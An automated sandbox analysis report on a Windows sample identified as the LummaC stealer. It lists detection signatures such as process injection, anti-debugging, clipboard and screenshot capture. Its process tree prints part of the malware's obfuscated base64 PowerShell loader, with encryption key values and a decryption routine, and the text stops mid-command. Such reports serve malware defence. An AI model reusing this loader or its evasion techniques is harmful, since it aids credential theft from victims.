Windows Analysis Report: file.exe
Overview
General Information
Detection
LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Contains functionality to prevent local Windows debugging
Injects a PE file into a foreign process
LummaC encrypted strings found
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number, etc.) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- file.exe (PID: 6944 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A2B2889063A7A3F9785253F937EE6FE4)
- powershell.exe (PID: 7036 cmdline: "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q